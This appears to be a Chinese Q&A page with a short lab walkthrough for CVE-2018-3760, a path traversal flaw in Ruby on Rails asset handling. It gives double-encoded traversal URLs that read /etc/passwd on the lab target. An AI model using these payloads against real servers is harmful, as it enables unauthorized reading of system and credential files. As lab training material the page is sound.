已解决
墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)
来自网友在路上 175875提问 提问时间:2023-11-07 05:53:41阅读次数: 75
最佳答案 问答题库758位专家为你答疑解惑
打开 web 页面:
发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:
/assets/file:%2f%2f/etc/passwd
根据报错路劲构造 payload:
/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
查看全文
99%的人还看了
相似问题
猜你感兴趣
版权申明
本文"墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)":http://eshow365.cn/6-34280-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!
- 上一篇: Electron[3] 基础配置准备和Electron入门案例
- 下一篇: linux内的循环